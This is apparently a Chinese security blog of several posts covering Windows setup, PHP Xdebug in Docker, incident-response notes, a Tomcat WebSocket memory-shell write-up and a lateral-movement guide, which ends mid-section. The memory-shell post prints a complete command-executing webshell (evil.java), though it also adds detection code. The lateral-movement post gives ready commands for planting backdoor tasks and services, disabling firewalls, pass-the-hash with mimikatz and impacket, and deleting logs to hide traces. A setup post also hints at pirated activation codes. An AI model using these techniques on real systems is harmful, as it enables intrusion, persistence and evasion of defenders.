wh1sper

从0开始的Windows配环境之旅

admin[at]wh1sper.com (wh1sper) — Wed, 08 Feb 2023 16:06:36 +0800

用了2.5年的matebook实在是有点小卡，总共就512G的硬盘也爆炸了，瞧了瞧M2 pro的牙膏，心想还是再苟一苟，等等党永远不亏，所以就下狠心直接重装了Windows。

重装Windows

这没啥好说的，wepe，NEXT, ITELLYOU，傲梅分区助手（wepe自带）

十多分钟搞定，主要是配环境和其他的问题。

配置各种环境

语言倒不是很麻烦，各种语言能上多版本管理工具的都上了，版本之间环境隔离，用起来挺舒服

PHP：PHPstudy，打过CTF的都说好，还自带MySQL，nginx等多版本管理的功能，谁用谁知道。不过要注意低版本以前出过后门事件，使用的时候留意一下。
Node.js：nvm-windows，Go写的nodejs多版本管理工具，通过软链接和环境变量实现版本隔离，每个版本的npm也是隔离的，node默认安装在nvm同级目录，也不用担心占用C盘空间。
Golang：g(gvm)，各平台通用的golang版本管理工具，也是通过软链接实现版本切换。默认会在用户目录下创建.g目录，担心占用C盘的可以在cmd下用mklink /J 链接到其他地方去。
Java：无工具，直接通过修改JAVA_HOME环境变量实现版本切换，担心maven仓库占用C盘的用mklink /J命令把.m2目录链接到D盘去
Python：没多版本切换的需求，只有Python2，3并存的需求，直接去官网下载安装包分别装到两个目录就行了，然后把python2的python.exe复制一份重命名为python2.exe，原来的python.exe别删，删了不好使。配环境变量的时候把python3目录放到python2目录之前，就可以保证使用命令python的时候执行python3。对于pip，2.7版本可以直接在换源之后curl https://bootstrap.pypa.io/pip/2.7/get-pip.py | python2来安装。

IDE

IntelliJ IDEA，宇宙最强Java IDE，没啥好说的
PhpStorm，调php代码用
Visual Studio Code，除了Java和php其他都用这个，插件多，生态丰富

Docker和wsl肯定不可或缺，装docker之前先装wsl2

WSL：照着知乎的装，只不过我在store里面选择的Kali，这个Kali还可以装GUI，体验很不错。照着ms的文档配置性能参数
Docker：Docker desktop for Windows，照着官网来，别忘了换源啥的。
迁移wsl和docker的数据：担心占C盘用WSL管理工具LxRunOffline，我用的mingw版本，可以把Docker和WSL的硬盘都迁移到D盘去

Terminal、powershell7和美化

Terminal直接在store里面搜，powershell去Github release下msi安装
美化
- 字体使用Nerd Fonts，我用的Hack，看起来是这样
- Oh-my-posh现在已经不支持powershell module了，按照官方文档照着装
- 主题我用的stelbent，可以在powershell里输入notepad $profile来设置，分享下我的：
```
oh-my-posh init pwsh --config "$env:POSH_THEMES_PATH\stelbent.minimal.omp.json" | Invoke-Expression
Import-Module posh-git
```

其他

Git、GitHub Desktop
utools，这个强烈推荐，里面的ctool超级好用，一般人我不告诉他。
Clash For Windows，懂得都懂
V2rayN，也很棒，多一个代理防止打内网的时候不能访问Google
geek uninstaller，卸载软件用
PicGo，配合GitHub图床，写博客用
VMware Workstation Pro，网上直接找激活码

对抗国产流氓软件

火绒高级防护

Windows Defender作为杀软确实不错，我的那些工具一下就给我吞了，但是在整治国产流氓软件这方面还得看火绒，推荐火绒的"高级防护"功能，可以自定义防护规则，防止创建目录和读取浏览器历史之类的。

规则可以在火绒论坛里找到，我用的是火绒安全自定义规则 v29.0.zip，导入的时候需要同时导入规则和自动处理。

根治流氓软件

因为我习惯了tim和360压缩，导入规则之后，火绒就疯狂给我告警。

]

但是由于一些原因，我有时候需要关闭火绒，这就给了这些软件可乘之机。

之前打awd的时候杀不死马可以创建同名目录来防止文件再生，这里我迁移一下，创建一个同名文件来防止目录创建

根据火绒安全日志里面的目录，一个个创建，注册表同理，创建一个键然后权限全部关掉。

然后世界就清净了。

小结

一套下来，C盘占用不到50G，D盘占不到100个G，四舍五入又拥有了一台新电脑。

Docker下PHP调试环境搭建

admin[at]wh1sper.com (wh1sper) — Sun, 29 Jan 2023 15:52:26 +0800

承接上一篇Debian下PHP 调试环境搭建

但是在虚拟机里安装PhpStorm或者在本机上调试都是不太优雅的方案，使用Docker运行调试不用担心php版本的问题，也不用去担心如何倒腾破环了宿主机的环境。

先补充下Xdebug的原理：

Xdebug的原理

浏览器向 Httpd 服务器发送一个带有 XDEBUG_SESSION_START 参数的请求，服务器收到这个请求之后交给后端的 PHP（已开启 xdebug 模块）进行处理
如果是默认配置xdebug.remote_connect_back = 0，那么xdebug在收到调试通知时会读取配置 xdebug.remote_host 和 xdebug.remote_port（默认是 localhost:9000），然后向这个端口发送通知。

如果开启xdebug.remote_connect_back = 1，xdebug会将请求来源的 IP 绑定，并通知

我们可以看到，Xdebug其实是需要从服务端（运行环境）发送消息到客户端（调试IDE）的，但是往往客户端是在内网，没有办法收到服务端的消息。

所以一般会用代理隧道技术解决这个问题，比如ssh。

注意，使用DBGp 代理只能让你debug的时候可以多人运动，但是并不能解决内网不可达问题

使用ssh隧道：

修改 php.ini。让xdebug.client_host值为127.0.0.1，这样当服务端收到一个带有参数的请求的时候，xdebug会向127.0.0.1:9003发送调试信息
客户端进行 ssh隧道端口转发

ssh -N -R 远程IP:远程端口:127.0.0.1:9003 root@远程IP

这样就能使用调试远程程序了。

使用DBGp 代理进行多用户调试

可以参考：通过 Xdebug 代理进行多用户调试

服务端使用DBGp监听127.0.0.1:9003，将xdebug发送的请求代理到客户端的9000端口

DBGp 代理可执行文件接受两个主要参数：

-i：用于侦听 IDE（客户端）连接的主机和端口
-s: 侦听调试器引擎（服务器）连接的主机和端口

`1`	`./dbgpProxy -s 127.0.0.1:9003 -i 0.0.0.0:9001`

用于监听客户端连接的地址最好填 0.0.0.0 ，避免网卡选错的麻烦。

宿主机无法收到Xdebug请求

问题：

在Docker中监听是能够收到Xdebug的请求的，但是在宿主机上用netcat或者PhpStorm监听收不到请求

还是网络不可达的问题，可以通过隧道技术或者设置xdebug配置参数client_host/remote_host为宿主机IP地址。

解决方法：

使用host.docker.internal，可以直接解析到宿主机IP，参考官方文档。

但是要注意xdebug2和3的配置参数是不一样的，启动的时候环境变量需要注意一下，可见官方文档

使用Dockerfile和Docker compose

按照PhpStorm官方的repo魔改了一个祖国版Dockerfile，我自己电脑上build大概五分钟：

FROM php:8.2-apache
# COPY --from=composer /usr/bin/composer /usr/bin/composer
RUN    php -r "readfile('https://getcomposer.org/installer');" | php \
    && mv /var/www/html/composer.phar /usr/bin/composer
RUN    sed -i "s@http://deb.debian.org@http://mirrors.aliyun.com@g" /etc/apt/sources.list \
    && apt clean \
    && apt-get update \
    && apt-get -y install libzip-dev libicu-dev \
    && docker-php-ext-install mysqli zip intl \
    && pecl install xdebug-3.2.0 \
    && docker-php-ext-enable xdebug \
    && echo "xdebug.mode=debug" >> /usr/local/etc/php/php.ini

# dbgpProxy, for multiuser debugging
# ssh, for tunnel
# RUN   curl https://xdebug.org/files/binaries/dbgpProxy -o /usr/bin/dbgpProxy \
#     && chmod +x /usr/bin/dbgpProxy \
#     && apt-get install ssh

docker-compose.yml:

version: '3.2'
services:
  webserver:
    build: .
    image: php-82-apache-xdebug-32
    container_name: php-82-apache-xdebug-32
    ports:
      - "50080:80"
      # - "9001:9001" # for dbgpProxy
    volumes:
      - ./html:/var/www/html
    environment:
      # Xdebug 2
      # XDEBUG_CONFIG: "remote_handler=dbgp remote_host=host.docker.internal idekey=PHPSTORM" 
      # Xdebug 3
      XDEBUG_CONFIG: "remote_handler=dbgp client_host=host.docker.internal" 
      XDEBUG_SESSION: "PHPSTORM"

可见Github，嫌麻烦也可以直接从Dockerhub拉image：

`1`	`docker pull wh1sperdiyu/php-82-apache-xdebug-32:latest`

配置PhpStorm

在设置-PHP-服务器中添加一个服务器，信息按照实际情况填写。选择路径映射，服务器上的绝对路径填写根目录，我这个镜像是/var/www/html/

添加一个运行配置，选择刚才的服务器

可以验证一下，注意此时需要服务器能访问到IDE的机器才可以验证成功

点击右上角开始监听，docker和IDE都在一台电脑上的情况下，让xdebug直接把debug信息打到宿主机IP也就是host.docker.internal就可以了

Reference

PHPSTORM调试Docker项目

PhpStorm 利用官方docker镜像启动虚拟环境及调试

成为高级 PHP 程序员的第一步——调试（xdebug 原理篇）

应急响应笔记

admin[at]wh1sper.com (wh1sper) — Mon, 15 Aug 2022 15:33:08 +0800

常见的应急响应事件分类：

Web入侵：网页挂马、主页篡改、Webshell
系统入侵：病毒木马、勒索软件、远控后门
网络攻击：DDOS攻击、DNS劫持、ARP欺骗

具体情况具体分析，如果是一台失陷的公网Web主机，那么着重从Web服务层面去排查，如果是内网一台Windows，那么着重从系统层面去排查，原则上能用工具则用工具

Linux

敏感目录

/tmp
/etc/init.d/ 自启动目录
web目录

ls -ltha列举所有文件

基于时间和权限的筛选

find ./ -mtime 0 -name "*.php"
# 查找24h内修改的php文件

find ./ -iname "*.php" -perm 777
# -iname 忽略大小写，-perm查找777权限

网络连接与进程

netstat -pantl
netstat -anpt
netstat -pantl | grep "ESTABLISHED"查看正在建立连接的端口

查看进程对应的文件

ps aux 
ps aux | grep ${PID}
lsof -i:${PORT} # 查看占用端口的进程号
kill -9 ${PID} # 
killall php-fpm # 杀死所有php-fpm进程

登录与用户

last -i | grep -v 0.0.0.0 # 查看登录日志，筛选非本地登录
w # 看现在那些用户登陆了
cat /etc/passwd | grep "0:0"
awk -F: '$3==0{print $1}' /etc/passwd # 查询特权用户
awk '/\$1|\$6/{print $1}' /etc/shadow # 查询可以远程登录的账号
more /etc/sudoers | grep -v "^#\|^$" grep "ALL=(ALL)" # 查询具有sudo权限的账号

历史命令

history
cat ~/.bash_history
cat /root/.bash_history

注意 .bash_history 要当ssh session正常退出之后才会写入，如果是非正常退出的话不会写入

计划任务

crontab -e
crontab -l

可以用工具解析

启动项、预加载文件

自启动服务

ls /etc/init.d/ # 自启动服务
/etc/init.d/xxx status #查看状态
update-rc.d disable # 取消开机自启

开机启动项

more /etc/rc.local
/etc/rc.d/rc[0-6].d
ls -l /etc/rc.d/rc3.d/

开机预加载的文件

系统级别
- /etc/profile
- /etc/paths
用户级别
- ~/.bash_profile （mac用的）
- ~/.bash_login
- ~/.profile
- ~/.bashrc (linux用的)

Windows

网络连接

netstat -ano

如果网络连接出现以下情况，则当前主机可能已经失陷

主机存在对内网网段大量主机的某些端口（常见如22，445，3389，6379等端口）或者全端口发起网络连接尝试，这种情况一般是当前主机被攻击者当作跳板机对内网实施端口扫描或者口令暴力破解等攻击。
主机和外网IP已经建立连接（ESTABLISHED状态）或者尝试建立连接（SYN_SENT状态），可以先查询IP所属地，如果IP为国外IP或者归属各种云厂商，则需要重点关注。进一步可以通过威胁情报（https://x.threatbook.cn等）查询IP是否已经被标注为恶意IP。
如果无法直接从网络连接情况判断是否为异常连接，可以根据网络连接找到对应的进程ID，判断进程是否异常。如果不能从进程判断，可以进一步找到进程对应文件，将对应文件上传至virustotal（https://www.virustotal.com）进行检测。

windows通过进程找到文件路径:

# 打开所有端口进程列表
netstat -ano

# 找到可以的端口链接
netstat -ano | findstr 13232

# 通过pid找到进程
tasklist | findstr 13232

# 通过进程找到文件路径
wmic process where name="firefox.exe" get processid,executablepath,name
wmic process get name,executablepath,processid|findstr 2860

敏感目录

各个盘符下的临时目录，如 C:\TEMP、C:\Windows\Temp等。
攻击队喜欢放马的目录，比如 C:\Users\Public 下的各个目录
浏览器的下载目录
%UserProfile%\Recent，查看用户最近操作的文件
回收站，如C盘下回收站C:\$Recycle.Bin
web目录

记得按照时间排序，来查看最近修改的文件夹

后门帐号

注册表 查看注册表中HKLM\SAM\SAM\Domains\Account\Users\Names （或者HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names）中是否有多余的账号（可询问客户运维人员以确定账号存在的必要性）。

正常情况下，上述路径的SAM权限仅system用户可查看，需要给administrator用户授权才能打开完整路径。对SAM右键、给administator用户添加完全控制权限，记得改回去

下图 admin$ 即为后门账号

计算机管理

compmgmt.msc # 查看用户和用户组
lusrmgr.msc #  查看用户和用户组

net命令

1
2
3

net user # 查询本机用户
net localgroup Administrators # 查询admin组
query user # 查询登录用户

启动项

启动目录

%programdata%\Microsoft\Windows\Start Menu\Programs\Startup # 系统启动目录
%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup # 用户登陆时启动目录

注册表

太多了，就说一两个：

Run注册表键值为开机启动项,每一次开机都会执行键值对应的程序或bat脚本
```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```
Logon Scripts是优先于很多杀毒软件启动的,所以可以通过这种方式达到一定的免杀效果

在注册表HKEY_CURRENT_USER\Environment这条路径下,添加新的字符串值,值的名字为:UserInitMprLogonScript，数值数据为想要启动程序的路径

另外

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runonce

注册表项很多，建议使用火绒剑一把梭

计划任务、服务

同样建议火绒剑一把梭

taskschd.msc # 计划任务查看器
schtasks # 命令行查看计划任务

services.msc # 服务查看器

systeminfo # 查询补丁信息

eventvwr.msc # 事件查看器（查看系统日志，安全日志）

Tomcat WebSocket内存马原理浅析

admin[at]wh1sper.com (wh1sper) — Tue, 19 Jul 2022 00:58:30 +0800

本文首发跳跳糖：《Tomcat WebSocket内存马原理浅析》

周末和N1k0la师傅看到了这个repo：wsMemShell，决定来研究一番。

正好某大行动要开始了，希望此文能抛砖引玉，给师傅们带来一些启发。文章写的不好，疏漏之处细节欢迎师傅们指正。

Tomcat WebSocket的实现

Tomcat自7.0.2版本开始支持WebSocket，采用自定义API，即WebSocketServlet。

从2013年有了JSR356标准之后，Tomcat自7.0.47版本废弃自定义的API，实现了Java WebSocket规范（JSR356 ）

根据JSR356规定，建立WebSocket连接的服务器端和客户端，两端对称，可以互相通信。把通信端点抽象成类，就是Endpoint，每一个Endpoint对象代表WebSocket链接的一端，服务器端的叫ServerEndpoint，客户端的叫ClientEndpoint。客户端向服务端发送WebSocket握手请求，建立连接后就创建一个ServerEndpoint对象。

ServerEndpoint和ClientEndpoint，有相同的生命周期事件（OnOpen、OnClose、OnError、OnMessage），不同之处是ServerEndpoint作为服务器端点，可以指定一个URI路径供客户端连接，ClientEndpoint则没有。

Endpoint对象的生命周期方法如下：

onOpen：当开启一个新的会话时调用。这是客户端与服务器握手成功后调用的方法，等同于注解@OnOpen。
onClose：当会话关闭时调用。等同于注解@OnClose。
onError：当链接过程中异常时调用。等同于注解@OnError。
onMessage：接收到消息时触发。等同于注解@OnMessage

服务端实现Endpoint的方式

服务器端的Endpoint有两种实现方式，一种是注解方式@ServerEndpoint，一种是继承抽象类Endpoint。

注解方式：@ServerEndpoint

官方文档：ServerEndpoint (Java(TM) EE 7 Specification APIs)

一个@ServerEndpoint注解应该有以下元素：

value：必要，String类型，此Endpoint部署的URI路径。
configurator：非必要，继承ServerEndpointConfig.Configurator的类，主要提供ServerEndpoint对象的创建方式扩展（如果使用Tomcat的WebSocket实现，默认是反射创建ServerEndpoint对象）。
decoders：非必要，继承Decoder的类，用户可以自定义一些消息解码器，比如通信的消息是一个对象，接收到消息可以自动解码封装成消息对象。
encoders：非必要，继承Encoder的类，此端点将使用的编码器类的有序数组，定义解码器和编码器的好处是可以规范使用层消息的传输。
subprotocols：非必要，String数组类型，用户在WebSocket协议下自定义扩展一些子协议。

比如：

`1`	`@ServerEndpoint(value = "/ws/{userId}", encoders = {MessageEncoder.class}, decoders = {MessageDecoder.class}, configurator = MyServerConfigurator.class)`

@ServerEndpoint可以注解到任何类上，但是想实现服务端的完整功能，还需要配合几个生命周期的注解使用，这些生命周期注解只能注解在方法上：

@OnOpen 建立连接时触发。
@OnClose 关闭连接时触发。
@OnError 发生异常时触发。
@OnMessage 接收到消息时触发。

继承抽象类：Endpoint

继承抽象类Endpoint，重写几个生命周期方法，实现两个接口，比加注解 @ServerEndpoint方式更麻烦。

其中重写onMessage需要实现接口jakarta.websocket.MessageHandler，给Endpoint分配URI路径需要实现接口jakarta.websocket.server.ServerApplicationConfig。

而URI path、encoders、decoders、configurator等配置信息由jakarta.websocket.server.ServerEndpointConfig管理，默认实现jakarta.websocket.server.DefaultServerEndpointConfig。

通过编程方式实现Endpoint，比如：

ServerEndpointConfig serverEndpointConfig = ServerEndpointConfig.Builder.create(WebSocketServerEndpoint3.class, "/ws/{userId}").decoders(decoderList).encoders(encoderList).configurator(new MyServerConfigurator()).build();

Tomcat WebSocket的加载

Tomcat提供了一个javax.servlet.ServletContainerInitializer的实现类org.apache.tomcat.websocket.server.WsSci。

ServletContainerInitializer（SCI）是 Servlet 3.0 新增的一个接口，主要用于在容器启动阶段通过编程风格注册Filter, Servlet以及Listener，以取代通过web.xml配置注册。这样就利于开发内聚的web应用框架.

具体可看：Servlet3.0研究之ServletContainerInitializer接口

因此Tomcat的WebSocket加载是通过SCI机制完成的。

WsSci可以处理的类型有三种：

添加了注解@ServerEndpoint的类
Endpoint的子类
ServerApplicationConfig的实现类

Tomcat在Web应用启动时会在StandardContext的startInternal方法里通过 WsSci 的onStartup方法初始化 Listener 和 servlet，再扫描 classpath下带有注解@ServerEndpoint的类和Endpoint子类

如果当前应用存在ServerApplicationConfig实现，则通过ServerApplicationConfig获取Endpoint子类的配置（ServerEndpointConfig实例，包含了请求路径等信息）和符合条件的注解类，通过调用addEndpoint将结果注册到WebSocketContainer上；如果当前应用没有定义ServerApplicationConfig的实现类，那么WsSci默认只将所有扫描到的注解式Endpoint注册到WebSocketContainer。因此，如果采用可编程方式定义Endpoint，那么必须添加ServerApplicationConfig实现。

然后startInternal方法里为ServletContext添加一个过滤器org.apache.tomcat.websocket.server.WsFilter，它用于判断当前请求是否为WebSocket请求，以便完成握手（所以任何Tomcat都可以用java-memshell-scanner看到WsFilter）。

Tomcat WebSocket内存马的实现

我们先来回顾一下servlet-api型内存马的实现步骤，拿Filter型举例：

获取当前的StandardContext
创建恶意Filter
创建filterDef封装Filter对象，调用StandardContext.addFilterDef方法将filterDef添加到filterDefs
创建filterMap将URL和filter进行绑定，调用StandardContext.addFilterMapBefore方法将filterMap添加到filterMaps中
获取filterConfigs变量，并向其中添加filterConfig对象

既然要插入恶意Filter，那么我们就需要在Tomcat启动过程中寻找添加FIlter的方法，而filterDef、filterMap、filterConfigs都是StandardContext对象的属性，并且也有相应的add方法，那么我们就需要先获取StandardContext，再调用相应的方法。

WebSocket内存马也很类似，上一节提到了WsSci 的onStartup扫描 classpath下带有注解@ServerEndpoint的类和Endpoint子类，并且调用addEndpoint方法注册到WebSocketContainer上。那么我们应该从WebSocketContainer出发，而WsServerContainer是在StandardContext里面创建的，那么，显而易见的：

获取当前的StandardContext
通过StandardContext获取ServerContainer
定义一个恶意类，并创建一个ServerEndpointConfig，给这个恶意类分配URI path
调用ServerContainer.addEndpoint方法，将创建的ServerEndpointConfig添加进去

1
2
3

ServerContainer container = (ServerContainer) req.getServletContext().getAttribute(ServerContainer.class.getName());
ServerEndpointConfig config = ServerEndpointConfig.Builder.create(evil.class, "/ws").build();
container.addEndpoint(config);

demo

将注入内存马的操作放在static块，加载这个类即可实现内存马注入

evil.java:

import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.websocket.server.WsServerContainer;

import javax.websocket.*;
import javax.websocket.server.ServerContainer;
import javax.websocket.server.ServerEndpointConfig;
import java.io.InputStream;

public class evil extends Endpoint implements MessageHandler.Whole<String> {
    static {
        WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
        StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
        ServerEndpointConfig build = ServerEndpointConfig.Builder.create(evil.class, "/evil").build();
        WsServerContainer attribute = (WsServerContainer) standardContext.getServletContext().getAttribute(ServerContainer.class.getName());
        try {
            attribute.addEndpoint(build);
            // System.out.println("ok!");
        } catch (DeploymentException e) {
            throw new RuntimeException(e);
        }
    }

    private Session session;

    public void onMessage(String message) {
        try {
            boolean iswin = System.getProperty("os.name").toLowerCase().startsWith("windows");
            Process exec;
            if (iswin) {
                exec = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", message});
            } else {
                exec = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", message});
            }

            InputStream ips = exec.getInputStream();
            StringBuilder sb = new StringBuilder();

            int i;
            while((i = ips.read()) != -1) {
                sb.append((char)i);
            }

            ips.close();
            exec.waitFor();
            this.session.getBasicRemote().sendText(sb.toString());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    @Override
    public void onOpen(Session session, EndpointConfig config) {
        this.session = session;
        this.session.addMessageHandler(this);
    }
}

效果：

WebSocket内存马的检测方法

addEndpoint之后，可以在wsServerContainer里面有个configExactMatchMap属性里面找到Endpoint

只需要想办法拿到这个configExactMatchMap里面的config，然后就可以调用getPath等方法就可以拿到endpoint的各种属性，以此来判别是否为内存马

public synchronized List<ServerEndpointConfig> getEndpointConfigs(HttpServletRequest request) throws Exception {
    ServerContainer sc = (ServerContainer) request.getServletContext().getAttribute(ServerContainer.class.getName());
    Field _configExactMatchMap = sc.getClass().getDeclaredField("configExactMatchMap");
    _configExactMatchMap.setAccessible(true);
    ConcurrentHashMap configExactMatchMap = (ConcurrentHashMap) _configExactMatchMap.get(sc);

    Class _ExactPathMatch = Class.forName("org.apache.tomcat.websocket.server.WsServerContainer$ExactPathMatch");
    Method _getconfig = _ExactPathMatch.getDeclaredMethod("getConfig");
    _getconfig.setAccessible(true);

    List<ServerEndpointConfig> configs = new ArrayList<>();
    Iterator<Map.Entry<String, Object>> iterator = configExactMatchMap.entrySet().iterator();

    while (iterator.hasNext()) {
        Map.Entry<String, Object> entry = iterator.next();
        ServerEndpointConfig config = (ServerEndpointConfig)_getconfig.invoke(entry.getValue());
        configs.add(config);
    }
    return configs;
}


configs = getEndpointConfigs(request);
for (ServerEndpointConfig cfg : configs) {
    System.out.println(cfg.getPath())；
    System.out.println(cfg.getEndpointClass().getName())；
    System.out.println(cfg.getEndpointClass().getClassLoader().getClass().getName())；
    System.out.println(classFileIsExists(cfg.getEndpointClass()))；
    System.out.println(cfg.getEndpointClass().getName())；
    System.out.println(cfg.getEndpointClass().getName())));
}

已PR到：java-memshell-scanner

说句题外话：有一说一，用Tomcat起WebSocket服务不是那么常见，如果发现了有注册的Endpoint的话，蓝队们还需要谨慎对待。

参考

WebSocket 内存马，一种新型内存马技术

Servlet3.0研究之ServletContainerInitializer接口

websocket之三：Tomcat的WebSocket实现 - duanxz

WebSocket通信原理和在Tomcat中实现源码详解

内网横向移动方法

admin[at]wh1sper.com (wh1sper) — Wed, 01 Jun 2022 18:08:48 +0800

IPC连接

条件：

1、目标机开启了139和445端口；

2、目标主机管理员开启了ipc$默认共享；

3、知道目标机的（权限足够的）账户密码。

4、NT或以上操作系统

IPC$(Internet Process Connection)是共享”命名管道”的资源，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个连接，利用这个连接，连接者可以得到目标主机上的目录结构、用户列表等信息。

命令：

net use \\192.168.10.2\ipc$ /user:"username" "password"
//建立ipc连接
net use \\192.168.10.2 /u:domainname\username "password"
// 域中建立ipc连接
net use \\192.168.10.2 /de /y 
// 删除ipc连接(使用完之后记得删除)

用IPC进行文件目录操作

net view \\192.168.10.2 
//查看共享目录
net view \\192.168.10.2\c$\users 
//列出指定目录文件
copy shell.exe \\192.168.10.2\C$\windows\temp\ 
//复制文件到目标目录
copy \\192.168.10.2\C$\windows\temp\hash.txt 
//下载文件到当前目录
net use z: \\192.168.10.2\c$ "密码" /user:"用户名"  
//将对方的c盘映射为自己的z盘

IPC常见错误号

1.错误号5，拒绝访问：很可能你使用的用户不是管理员权限的，先提升权限；
2.错误号51，Windows 无法找到网络路径：网络有问题；
3.错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
4.错误号67，找不到网络名：你的lanmanworkstation服务未启动；目标删除了ipc$；
5.错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连。
6.错误号1326，未知的用户名或错误密码：原因很明显了；
7.错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动。（连接域控会出现此情况）
8.错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。

Windows计划任务

1.先建立IPC连接

2.确定目标主机DC的当前时间

net time \\192.168.10.2

3.拷贝木马到目标机器

copy shell.exe \\192.168.10.2\C$\windows\temp\

4 .创建计划任务

Vista 和 Server 2008 之后：

在使用schtasks命令时，会在系统中留下日志文件C:\Windows\Tasks\SchedLgU.txt（记得删）

schtasks /create /s 192.168.10.2 /tn backdoor /sc minute /mo 1  /tr c:\shell.exe /ru system /f
// 创建一个名称为"backdoor"的计划任务。该计划任务每分钟启动一次，启动程序为c:\shell.exe，启动权限为system
schtasks /run /s 192.168.10.2 /i /tn backdoor
// i：忽略任何限制立即运行任务
schtasks /delete /s 192.168.10.2 /tn "backdoor" /f
// 强制删除名称为"backdoor"计划任务（记得删）

在没有建立ipc连接时，要加上/u和/p参数分别设置用户名(域中为域\域用户)和密码。如果因为权限或组策略设置等原因报错拒绝访问，要加上/u和/p参数分别设置高权限用户名和密码。

Vista 和 Server 2008 之前：

at \\192.168.10.2 15:47:00 c:\beacon.exe //创建计划任务
at \\192.168.10.2 1 /delete //删除ID为1的计划任务

Windows服务

条件：

1、当前跳板机用户具有管理员权限(因为要创建服务)。

2、与目标机器已经建立ipc连接

1.建立IPC连接

2.拷贝木马到目标机器

copy shell.exe \\192.168.10.2\C$\windows\temp\

3.在目标主机DC上创建一个名称为“backdoor”的服务。命令如下：

sc \\[主机名 or IP] create [servicename] binpath= "[path]"   
//创建计划任务启动程序

注意这里的格式，“=” 后面是必须空一格的，否则会出现错误。

4.立即启动该服务：

sc \\192.168.10.2 start bindshell

5.删除刚才创建的服务

sc \\192.168.10.2 delete bindshell

我们还可以通过设置服务来关闭防火墙：

sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\WIN-ENS2VR5TR3N start unablefirewall

通过smb服务横向移动

利用条件

1、445端口开放

2、知道账号密码明文或hash

利用 SMB 服务可以通过明文或 hash 传递（PTH）来远程执行。

明文传递

PsExec.exe(微软官方工具)

使用条件

1.对方主机开启了 admin$ 共享，如果关闭了admin$共享，会提示：找不到网络名

2.对方未开启防火墙

3.如果是工作组环境，则必须使用administrator用户连接（因为要在目标主机上面创建并启动服务），使用其他账号(包括管理员组中的非administrator用户)登录都会提示访问拒绝访问。

4.如果是域环境，即可用普通域用户连接也可以用域管理员用户连接。连接普通域主机可以用普通域用户，连接域控只能用域管理员账户。

执行原理(会留下大量日志)：

通过ipc$连接，释放psexecsvc.exe到目标
通过服务管理SCManager远程创建psexecsvc服务，并启动服务。
客户端连接执行命令，服务端启动相应的程序并执行回显数据。
运行完后删除服务。这个在windows的日志中有详细的记录，另外psexec在少数情况下会出现服务没删除成功的bug，所以一般不推荐使用psexec，推荐wmiexec

可先建立ipc连接再使用psexec无需输入密码

net use \\IP /u:domainname\username password
//建立IPC通道
psexec.exe \\192.168.10.2 -s cmd.exe -acceptcula
//反弹cmd

或者直接使用：

.\PsExec.exe \\192.168.10.201 -u domainname\username -p password -s cmd.exe -acceptcula

-accepteula：第一次运行psexec会弹出确认框，使用该参数就不会弹出确认框 -u：用户名 -p：密码 -s：以system权限运行运程进程，获得一个system权限的交互式shell。如果不使用该参数，会获得一个连接所用用户权限的shell

PTH-哈希传递

利用条件

1、在工作组环境中：

Windows Vista 之前的机器，可以使用本地管理员组内用户进行攻击。

Windows Vista 之后的机器，只能是administrator用户的哈希值才能进行哈希传递攻击，其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击，会提示拒绝访问

2、在域环境中：

只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击，攻击成功后，可以访问域内任何一台机器

如果要用普通域管理员账号进行哈希传递攻击，则需要修改修改目标机器的 LocalAccountTokenFilterPolicy为1

psexec.py-PTH

与官方psexec.exe相比会自动删除服务，增加隐蔽性

https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py

这里推荐使用impacket套装,有exe和py版本

psexec.exe domain/username@10.73.147.30 -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de

之后会弹回一个system权限的交互shell。

python psexec.py  administrator@10.73.147.29   -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de

这种方式方便我们直接通过代理在自己本机执行(py测试2003,但exe可以成功)

smbexec.py

https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py

python smbexec.py ./:@192.168.52.136

wmiexec.py-PTH

https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py

python wmiexec.py -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de administrator@10.73.147.29

MiMiKatz-PTH

这个需要本地管理员权限(由Mimikatz的实现机制决定的)

privilege::debug
sekurlsa::logonpasswords
//抓取本机hash

privilege::debug
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:852a844adfce18f66009b4f14e0a98de
//将获取的Hash添加进lsass中

会弹出一个交互式的终端,这个终端以及伪造为我们指定的hash和用户，访问远程主机或服务，就不用提供明文密码了。我们可以通过copy文件，然后执行计划任务去拿到shell(这个思路有自动化实现的工具)。

pth批量横向移动

CrackMapExec：https://github.com/byt3bl33d3r/CrackMapExec/

CME集成了wmiexec、atexe、smbexec的方式,集成了smb扫描,口令爆破等功能,非常适合拿来快速移动。

用cme来进行网段的smb扫描确定目标系统和smb服务

cme smb 192.168.0.0/24 -t 255

批量传递hash:

